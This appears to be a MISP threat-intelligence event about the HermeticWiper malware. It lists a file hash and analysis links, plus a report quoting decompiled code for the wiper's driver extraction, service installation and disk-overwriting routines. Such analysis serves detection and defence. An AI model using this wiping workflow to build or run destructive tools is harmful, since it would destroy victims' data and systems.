misp-circl-feed/feeds/circl/misp/a097dd7c-8e29-40eb-a70d-1fb0b5cca689.json

93 lines
No EOL
14 KiB
JSON

{
"Event": {
"analysis": "1",
"date": "2022-02-25",
"extends_uuid": "b9b6dcfa-0b11-40dc-9bf4-9a36a2c1a046",
"info": "HermeticWiper",
"publish_timestamp": "1645809843",
"published": true,
"threat_level_id": "1",
"timestamp": "1645809833",
"uuid": "a097dd7c-8e29-40eb-a70d-1fb0b5cca689",
"Orgc": {
"name": "SCTIF",
"uuid": "5a313608-0410-4941-aaeb-8607950d210f"
},
"Tag": [
{
"colour": "#ffffff",
"local": "0",
"name": "tlp:white",
"relationship_type": ""
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1645809557",
"to_ids": true,
"type": "sha256",
"uuid": "90aef5c5-492d-4c84-adf8-60ff214a17c3",
"value": "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1645809780",
"to_ids": true,
"type": "link",
"uuid": "4cab8881-9318-4c40-a420-c4dd2bfbddf9",
"value": "https://twitter.com/Sebdraven/status/1496796936698884097?"
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1645809788",
"to_ids": true,
"type": "link",
"uuid": "215a5737-73a1-41e3-a4b8-c122377ad081",
"value": "https://twitter.com/0xthreatintel/status/1497192937406754818?t=GYbB_9wJzaZXcTLcXTbgww&s=19"
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1645809801",
"to_ids": true,
"type": "link",
"uuid": "a78adcbb-87ac-4942-8fa3-e5b85bac51e0",
"value": "https://analyze.intezer.com/analyses/fc5894d6-bbf0-419d-b670-0de2ac345fc5"
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1645809748",
"to_ids": false,
"type": "link",
"uuid": "260ee63c-ea28-4ba1-97bf-258b432fb758",
"value": "https://www.virustotal.com/gui/file/1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
}
],
"EventReport": [
{
"name": "Analyze",
"content": "# Analyse HermeticWiper\r\n\r\n## Summary\r\n\r\nThis wiper is composed of two parts:\r\n\r\n* a loader signed that setups the driver and configuration to execute the wiper\r\n* a [driver](https://www.fichier.net/processus/epmntdrv.sys.html) signed. It is a legitim sofware to erase the data\r\n\r\nThe loader executes the wiping using IOCTLs code to send orders to the driver.\r\n\r\n## Using Driver\r\n\r\nDriver is stored in 'RCDATA' ressources, in PE. And unzipped to store in System32 in function 004029d0. (TIP: find \"RCDATA\" in strings)\r\n\r\n```c\r\nhResInfo = FindResourceW(DAT_00407380,lpName,L\"RCDATA\");\r\nif (((hResInfo != (HRSRC)0x0) &&\r\n (hResData = LoadResource(DAT_00407380,hResInfo), hResData != (HGLOBAL)0x0)) &&\r\n (local_18 = LockResource(hResData), local_18 != (LPVOID)0x0)) {\r\nlocal_1c = (HKEY)SizeofResource(DAT_00407380,hResInfo);\r\n\r\n```\r\n\r\n## Unzip the driver\r\n\r\nThis ressource is unzipped and the driver is written in system32 folder.\r\n\r\n```c\r\n hfSource = LZOpenFileW(path_of_driver,&local_414,2);\r\n if (-1 < hfSource) {\r\n PathAddExtensionW(local_38c,L\".sys\");\r\n local_18 = (LPCVOID)LZOpenFileW(path_of_driver,&local_49c,0x1002);\r\n if ((int)local_18 < 0) {\r\n LZClose(hfSource);\r\n }\r\n else {\r\n LVar11 = LZCopy(hfSource,(INT)local_18);\r\n LZClose(hfSource);\r\n LZClose((INT)local_18);\r\n if (0 < LVar11) {\r\n pWVar12 = path_of_driver;\r\n if (local_20 != 0) {\r\n pWVar12 = StrStrIW(path_of_driver,L\"System32\");\r\n }\r\n local_28 = setup_service(pWVar12,local_6a4);\r\n```\r\n\r\n## Install Driver\r\n\r\nthe service is created and started in function 00403930 with OpenSCManagerW\r\n\r\n```c\r\n hSCManager = OpenSCManagerW((LPCWSTR)0x0,L\"ServicesActive\",3);\r\n if (hSCManager == (SC_HANDLE)0x0) {\r\n DVar6 = GetLastError();\r\n SetLastError(DVar6);\r\n return 0;\r\n }\r\n hService = OpenServiceW(hSCManager,service_name,0x16);\r\n if (hService == (SC_HANDLE)0x0) {\r\n DVar6 = GetLastError();\r\n pcVar5 = CloseServiceHandle_exref;\r\n if (DVar6 != 0x424) goto LAB_00403a52;\r\n hService = CreateServiceW(hSCManager,service_name,service_name,0xf01ff,1,3,1,l_path_drive,\r\n (LPCWSTR)0x0,(LPDWORD)0x0,(LPCWSTR)0x0,(LPCWSTR)0x0,(LPCWSTR)0x0);\r\n if (hService == (SC_HANDLE)0x0) {\r\n DVar6 = GetLastError();\r\n pcVar5 = CloseServiceHandle_exref;\r\n goto LAB_00403a52;\r\n }\r\n local_14 = 1;\r\n }\r\n else {\r\n local_1c = 0;\r\n local_34 = ZEXT816(0);\r\n local_24 = 0;\r\n BVar2 = QueryServiceStatus(hService,(LPSERVICE_STATUS)local_34);\r\n if (BVar2 == 0) {\r\n BVar2 = ChangeServiceConfigW\r\n (hService,1,3,1,l_path_drive,(LPCWSTR)0x0,(LPDWORD)0x0,(LPCWSTR)0x0,\r\n (LPCWSTR)0x0,(LPCWSTR)0x0,(LPCWSTR)0x0);\r\n if (BVar2 == 0) {\r\n DVar6 = GetLastError();\r\n pcVar5 = CloseServiceHandle_exref;\r\n CloseServiceHandle(hService);\r\n goto LAB_00403a52;\r\n }\r\n }\r\n else {\r\n uVar3 = (uint)(local_34._4_4_ == 4);\r\n }\r\n }\r\n uVar4 = 0;\r\n do {\r\n if (uVar3 != 0) break;\r\n uVar3 = StartServiceW(hService,0,(LPCWSTR *)0x0);\r\n Sleep(1000);\r\n uVar4 = uVar4 + 1;\r\n } while (uVar4 < 5);\r\n DVar6 = 0;\r\n if (uVar3 == 0) {\r\n DVar6 = GetLastError();\r\n pcVar5 = CloseServiceHandle_exref;\r\n if (DVar6 == 0x420) {\r\n uVar3 = 1;\r\n CloseServiceHandle(hService);\r\n goto LAB_00403a52;\r\n }\r\n if (local_14 != 0) {\r\n DeleteService(hService);\r\n }\r\n```\r\n\r\n## Crypto Stuff\r\n\r\nThe loader generates an random number to use to wipe in function: 00401590\r\n\r\n```c\r\n success = CryptAcquireContextW\r\n ((HCRYPTPROV *)&PROV_RSA_FULL,(LPCWSTR)0x0,(LPCWSTR)0x0,1,0xf0000040);\r\n if (success != 0) {\r\n success = CryptGenRandom((HCRYPTPROV)PROV_RSA_FULL,(DWORD)lenght,(BYTE *)buffer);\r\n if (success == 0) {\r\n for (; lenght != (int *)0x0; lenght = (int *)((int)lenght + -1)) {\r\n *(undefined *)buffer = 0;\r\n buffer = (int *)((int)buffer + 1);\r\n }\r\n }\r\n CryptReleaseContext((HCRYPTPROV)PROV_RSA_FULL,0);\r\n }\r\n```\r\n\r\n## Wiping\r\n\r\nManipulate ReadWrite with DeviceIoControl to send the order to the driver in FUN_004023c0\r\n\r\n```c\r\n BVar3 = GetDiskFreeSpaceW(rooth,&sectorPerCluster,&BytesBySector,(LPDWORD)0x0,(LPDWORD)0x0);\r\n if (BVar3 == 0) {\r\n hDevice_00 = (HANDLE)0xffffffff;\r\n }\r\n else {\r\n hDevice_00 = CreateFileW((LPCWSTR)&path_file_218,0x12019f,3,(LPSECURITY_ATTRIBUTES)0x0,3,0,\r\n (HANDLE)0x0);\r\n h_device_local_24c = hDevice_00;\r\n if ((hDevice_00 != (HANDLE)0x0) && (hDevice_00 != (HANDLE)0xffffffff)) {\r\n dwBytes = 0x80;\r\n DVar9 = 8;\r\n hHeap = GetProcessHeap();\r\n local_288 = (uint *)HeapAlloc(hHeap,DVar9,dwBytes);\r\n /* IOCTL_TR_SERVICE_QUERY */\r\n if ((local_288 != (uint *)0x0) &&\r\n (BVar3 = DeviceIoControl(hDevice_00,0x560000,(LPVOID)0x0,0,local_288,0x80,&local_268,\r\n (LPOVERLAPPED)0x0), BVar3 != 0)) {\r\n local_270 = 0;\r\n local_280 = 0;\r\n local_27c = 0;\r\n do {\r\n local_284 = (int *)0x0;\r\n local_248 = local_27c;\r\n local_244 = local_280;\r\n /* FSCTL_GET_RETRIEVAL_POINTERS */\r\n DeviceIoControl(hDevice,0x90073,&local_248,8,&local_240,0x20,&local_268,\r\n (LPOVERLAPPED)0x0);\r\n DVar9 = GetLastError();\r\n local_270 = local_270 & 0xffffffff00000000 | (ulonglong)uStack556;\r\n local_260 = local_230;\r\n if (DVar9 != 0) {\r\n hDevice_00 = h_device_local_24c;\r\n if (DVar9 != 0xea) break;\r\n local_27c = local_230;\r\n local_280 = uStack556;\r\n }\r\n piVar6 = (int *)(sectorPerCluster * BytesBySector);\r\n iVar2 = FUN_00404130(local_288,(uint)piVar6,uStack552,uStack548,(uint *)&local_284);\r\n if (iVar2 != 0) {\r\n DVar10 = BytesBySector;\r\n size = piVar6;\r\n uVar7 = __allmul(local_260 - uStack568,\r\n ((int)local_270 - iStack564) - (uint)(local_260 < uStack568),\r\n (uint)piVar6,0);\r\n uVar8 = __allmul((uint)piVar6,0,uStack552,uStack548);\r\n CryptoManipulation(local_274,local_284,(int *)((uint)uVar8 + local_288[4]),\r\n (int *)((int)(uVar8 >> 0x20) + local_288[5] +\r\n (uint)CARRY4((uint)uVar8,local_288[4])),(int *)uVar7,\r\n (int *)(uVar7 >> 0x20),DVar10,size);\r\n local_278 = 1;\r\n }\r\n hDevice_00 = h_device_local_24c;\r\n hDevice = local_250;\r\n } while (DVar9 == 0xea);\r\n```\r\n\r\n## Listing Root, Drive and Volume\r\n\r\n### List directory under the root\r\n\r\nFunction 00402f30\r\n\r\n```c\r\n\r\nundefined4 get_alldir_root_disk(LPCWSTR param_1,undefined4 param_2,int param_3)\r\n\r\n{\r\n LPWSTR pWVar1;\r\n uint uVar2;\r\n wchar_t *local_20 [7];\r\n \r\n uVar2 = 0;\r\n local_20[0] = L\"Windows\";\r\n local_20[1] = L\"Program Files\";\r\n local_20[2] = L\"Program Files(x86)\";\r\n local_20[3] = L\"PerfLogs\";\r\n local_20[4] = L\"Boot\";\r\n local_20[5] = L\"System Volume Information\";\r\n local_20[6] = L\"AppData\";\r\n do {\r\n pWVar1 = StrStrIW(param_1,local_20[uVar2]);\r\n if (pWVar1 != (LPWSTR)0x0) {\r\n if ((*(uint *)(param_3 + 0x18) & 7) == 0) {\r\n Sleep(0);\r\n *(undefined4 *)(param_3 + 0x18) = 1;\r\n return 0;\r\n }\r\n *(uint *)(param_3 + 0x18) = *(uint *)(param_3 + 0x18) + 1;\r\n return 0;\r\n }\r\n uVar2 = uVar2 + 1;\r\n } while (uVar2 < 7);\r\n return 1;\r\n}\r\n\r\n\r\n```\r\n\r\n## List files and directories\r\n\r\nthe function 00403621 is recursive and using FindFirstFile and FindNextFile API\r\n\r\n```c\r\n if ((handle_file._0_4_ & 0x400) == 0) {\r\n if ((handle_file._0_4_ & 0x10) == 0) {\r\n local_8 = (*(code *)fun_2_*)(buff,handle_file,pointer_manip);\r\n }\r\n else if (local_20 == (code *)0x0) {\r\n local_8 = listing_files(buff,(undefined *)0x0,fun_2_*,pointer_manip);\r\n }\r\n else {\r\n iVar13 = (*local_20)(buff,handle_file,pointer_manip);\r\n if (iVar13 != 0) {\r\n local_8 = listing_files(buff,fun_1_*_00,fun_2_*,pointer_manip);\r\n }\r\n````\r\n\r\n## Diff NTFS and FAT\r\n\r\nIn function 00401b80, the crypto manipulation depends on NTFS or FAT.\r\n\r\nFAT\r\n\r\n```c\r\n pCVar4 = StrStrA((LPCSTR)&local_74,\"FAT\");\r\n if (pCVar4 == (LPSTR)0x0) {\r\n local_70 = *(undefined4 *)(param_2 + 0x56);\r\n local_74 = *(undefined4 *)(param_2 + 0x52);\r\n pCVar4 = StrStrA((LPCSTR)&local_74,\"FAT\");\r\n if (pCVar4 == (LPSTR)0x0) {\r\n return 0;\r\n }\r\n }\r\n uVar6 = (uint)*(ushort *)(param_2 + 0xb);\r\n uVar3 = (uint)*(ushort *)(param_2 + 0x16);\r\n if (*(ushort *)(param_2 + 0x16) == 0) {\r\n uVar3 = *(uint *)(param_2 + 0x24);\r\n }\r\n uVar5 = *(ushort *)(param_2 + 0xe) * uVar6;\r\n CryptoManipulation(param_3,param_4,(int *)(uVar5 + param_5),\r\n (int *)(((int)uVar5 >> 0x1f) + param_6 + (uint)CARRY4(uVar5,param_5)),\r\n (int *)((*(byte *)(param_2 + 0x10) * uVar3 +\r\n (int)((uint)*(ushort *)(param_2 + 0x11) * 0x20 + -1 + uVar6) /\r\n (int)uVar6) * uVar6),(int *)0x0,uVar6,\r\n (int *)(*(byte *)(param_2 + 0xd) * uVar6));\r\n iVar2 = 1;\r\n }\r\n```\r\n\r\nNTFS\r\n\r\n```c\r\n iVar2 = lstrcmpA((LPCSTR)&local_74,\"NTFS \");\r\n if (iVar2 == 0) {\r\n iVar2 = readfile(param_1,param_2,param_5,param_6,local_68);\r\n if (iVar2 != 0) {\r\n uVar3 = (uint)*(ushort *)(param_2 + 0xb);\r\n piVar7 = (int *)(*(byte *)(param_2 + 0xd) * uVar3);\r\n piVar10 = piVar7;\r\n uVar8 = __allmul(*(uint *)(param_2 + 0x30),*(uint *)(param_2 + 0x34),(uint)piVar7,0);\r\n lVar1 = uVar8 + CONCAT44(param_6,param_5);\r\n CryptoManipulation(param_3,param_4,(int *)lVar1,(int *)((ulonglong)lVar1 >> 0x20),local_30,\r\n local_2c,uVar3,piVar10);\r\n uVar3 = (uint)*(ushort *)(param_2 + 0xb);\r\n piVar9 = (int *)0x0;\r\n piVar10 = piVar7;\r\n uVar8 = __allmul(*(uint *)(param_2 + 0x38),*(uint *)(param_2 + 0x3c),(uint)piVar7,0);\r\n lVar1 = uVar8 + CONCAT44(param_6,param_5);\r\n CryptoManipulation(param_3,param_4,(int *)lVar1,(int *)((ulonglong)lVar1 >> 0x20),piVar7,\r\n piVar9,uVar3,piVar10);\r\n return iVar2;\r\n }\r\n\r\n```",
"id": "99",
"event_id": "98313",
"timestamp": "1645809361",
"uuid": "11fd8080-ebcc-4347-bc28-c49087bf4ab5",
"deleted": false
}
]
}
}